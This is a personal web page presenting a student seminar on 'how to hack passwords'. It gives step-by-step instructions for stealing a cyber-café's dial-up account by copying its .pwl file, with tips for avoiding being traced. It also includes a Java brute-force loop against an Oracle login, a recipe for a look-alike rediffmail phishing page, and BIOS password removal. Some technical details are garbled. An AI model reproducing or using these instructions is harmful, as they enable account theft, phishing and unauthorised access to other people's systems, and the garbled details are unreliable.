About me | My thinking | Seminar given | Project done | FAQ | personal |
( This is my final semester's seminar) How to hack password? (Only methods and fundamentals) IntroductionPassword can be described as verification or an authentication tool. Ø Password is used to provide authority or the permission to those users who have got proper access. Ø Password is used in many places like for login in a computer or login to your mail box. Can we hack password? Ø From hacker point of view, YES. But it requires a good luck for implementing or choosing a good logic or it may need a long time to get a password. How password can be hacked? Password can be hacked by the following methods 1. By hit and trial method. 2. By finding the location of the password (where the coded password is stored) and try to decode it. 3. A program will insert the password to a database or mail-ID automatically till the access is not granted. 4. By making the user fool, you get the password from them. 1. Hit and trial method Ø If you are lucky enough then you may get password by this way. Ø And you have no need of having any programming knowledge or required software. Ø Getting success by this method is very difficult.
So why does this method exist? This method exists only for the following causes. Ø Most of the user keep password same as their name. Ø Users also use to choose date of birth, spouse’s name, girl friend’s name, pet’s name or child’s name…..etc as their password. Ø Some people have given their password as “enter" (means blank) due to their laziness. Ø The above password can be hacked easily by hit and trial method. How to protect your password? Ø Try to choose a word, which is not in the dictionary. Ø And should contain both numbers, lower case & upper case alphabets. Ø It is more secure to use some of the symbols like (#, $, %,*), because it can only be cracked by Brute Force attack. 2. Find the location of the password and try to decode it. By this method you can crack the password of windows98, windows ME. By this method you can also get the password of net-account of a cyber-café with Dial-up connection. To know the password have to use a software like 123WASP (Write All Stored Password) How to crack windows98/ME logon password The login passwords of these operating systems are stored in a file having extension “.pwl” and the file name is same as the user name. i.e. <user name>.pwl The location of the file is \\WINDOWS\ Suppose you just want to login in the windows in another user name. Let us take an example:- Your user name is manoj but you want to login into windows in the user name saroj. First create a user having name saroj in another machine having same operating system.Then copy the saroj.pwl file in a floppy. Now replace the saroj.pwl file of the victim computer with the saroj.pwl file which is created by you. Now I think you can easily login into the victim computer using the user name saroj. Another short-cut way Ø For cracking these operating systems you just need to rename these files and press enter at the time of login. Ø You can also use the software 123wasp for know the password (it is specially used for hacking net-account of cyber cafes.) After clicking the “Analyze password file” button. How to hack net-acount using 123WASP software To hack net-account of a cyber-café with Dial-up connection, you have to follow the following steps. This method is only valid for windows98 and windows ME. --- Steps 1. First of all you have to choose a cyber-cafe where you can get the permission to sit in the server. I think almost all cyber-cafe are using windows98 or windows ME operating system. As they are technically not sound in that manner, so they may give you permission to sit in the server. 2. Now you first click on start menu and see the <user name> at log off. 3. Then go to the windows directory search for the <user name>.pwl file. (suppose the user name is manoj then the file will be manoj.pwl) 4. Copy this file in a floppy. 5. Now create a user having same name of the cyber-cafe’s user name 6. Replace your computer’s <user name>.pwl with cyber-cafe’s <user name>.pwl 7. Then open the 123WASP, it will show you the cyber-cafe’s login password and Dial-up connection password both.
Precaution in using this type of net-account 1. Don’t try to change the password of the net-account. If you do this then the cyber-cafe is not be able to access the account and also inform the service provider about this. At that time you may be traced out easily. 2. Don’t try to use more hour in this account .And try to use it at mid-night when net-account is totally free. 3. A program will insert the password to a database or mail-ID automatically till the access is not granted. By this method I will show you how you can be able to hack Oracle database password. ORACLE Password cracking Ø The program will insert the password to a database automatically till the access is not granted. This is also known as brute force attack in the hackers’ world. Ø When every technique fails, then the hackers use this technique. Ø This is the most powerful technique and it definitely cracks the password but it takes a long time to do that. Ø It uses all the ASCII codes which are used by a computer. Algorithm of this method Steps 1. First the software generates a password. 2. Then it tries to login into the database as a user. 3. If it fails to login then it generates a new password and goes to step2. else (login success) print the password.
Maximum possible condition Suppose you have to choose a password having using only 0’s and 1’s. So the maximum possible passwords are as follows. You can’t choose any word other then these. And program can able to generate all these word by starting from 0000 and go on 1 to the 0000. By adding 1 in the generated password you can able to generate each and every word in between 0000 to 1111.
In the similar manner by using the ASCII code you can able to generate each and every word which can be formed by using all numbers, alphabets and special character. You can also able to generate word having one character to 14 characters or more then that. Now I will show you how you can be able to generate word having 5 characters. As the oracle database is having user name ‘scott’ and password ‘tiger’. Source code
Ø int f=0; Ø loop1: for(i=0;i<255;i++) Ø {loop2: for(j=0;j<255;j++) Ø {loop3: for(k=0;k<255;k++) Ø {loop4: for(l=0;l<255;l++) Ø {loop5: for(m=0;m<255;m++) Ø { Ø a=(char)i; b=(char)j; c=(char)k; Ø d=(char)l; e=(char)m; Ø st1[0]=a; st1[1]=b;st1[2]=c; Ø st1[3]=d;st1[4]=e; Ø String st2=new String(st1); Ø st3=st2; Analysis Ø Loop1 aaaaa …(varing the 1st char)… zaaaa Ø Loop2 aaaaa …(varing the 2nd char)… zzaaa Ø Loop3 aaaaa …(varing the 3rd char)… zzzaa Ø Loop4 aaaaa …(varing the 4th char)… zzzza Ø Loop5 aaaaa …(varing the 5th char)… zzzzz By nesting it (the above 5 loops) we can able to generate each and every word in between aaaaa to zzzzz. Continuing……
Ø try Ø { cn=DriverManager.getConnection(url,"scott",st2); //putting the generated password Ø Statement s=cn.createStatement(); //this line will execute when the password is correct. Ø f=1; Ø break loop1; //after getting password we have to break the loop. Ø } Ø catch(Exception eq) Ø { Ø System.out.println(eq); Ø System.out.println(st2); Ø if (m!=118) continue loop5; Ø else if (l!=103) continue loop4; Ø else if (k!=105) continue loop3; Ø else if (j!=108) continue loop2; Ø else if (i!=118) continue loop1; Ø } } } } } //end of all loops Ø } // end of all catch block Ø if(f= = 1) Ø System.out.println("Password is "+st3); Ø else Ø System.out.println("Password is not found); Ø } Ø } 4. Try to make the user fool Ø You can get the password from the user by making them fool. Ø There is an easy method behind it. Ø But you have to know servlet programming or asp (to do server side programming) Ø Suppose the user has got an email id in rediffmail Algorithm of this tech. Steps 1. First make a webpage similar to re-login rediffmail webpage. 2. Name it as redifmail.com (domain name). 3. write something like “due to security purpose your account is now close to please re-login again. 4. Add a method to the sign in button which will store the username and password of the victim in a database or file. 5. Send a link of this page to the mail id of the victim giving some interesting name so that victim must click the link. How to crack BIOS password There is an easy technique for cracking the BIOS password. You have to just open the cabinet and remove the CMOS battery. After that restart that system. You will see that the BIOS password has vanished. I am 100% sure that, this will give you success in anyhow. What is the reason behind it? Actually in the mother-board there is an in-built RAM, which is used to store the date, time and the setting of the BIOS. It gets the power from the CMOS battery. So if we remove the CMOS battery then BIOS comes to the default setting. In every mother board there is no password in default setting. How to change the processor speed of a computer This is a one type of hacking technique which is mostly used by the computer vender. By using this technique the venders try to sell the 1.6MHz in the cost of 1.7MHz or more then that. Let us see how it can be done. This technique is also known as over-clocking the processor. To understand this technique, first of all you have to know what a clock is. The operating systems now we are using are based on multitasking, multiprogramming and multithreading. But still the processor is single-tasking. That means at any time slice the processor will execute only one command. We can get the time slice by taking the reciprocal of the frequency. You can say one time slice is equivalent to one clock. The clock is used to generate 1 pulse in each time slice. This pulse helps the processor to start executing a single command. The execution will finish in one time slice. The clock also helps the processor to synchronize with the other hardware devices which are connected with the processor. The duration of a 1 time slice is totally depend upon the clock. So if we increase the rate of clock pulse, then the duration of time slice will decrease and the frequency of the processor will increase. For changing the clock speed you just need to enter into the BIOS. The main drawback of this technique is the processor will produce more heat. The life period and the performance also get degraded very rapidly. So don’t use this technique on your computer.
|
About me | My thinking | Seminar given | Project done | FAQ | personal |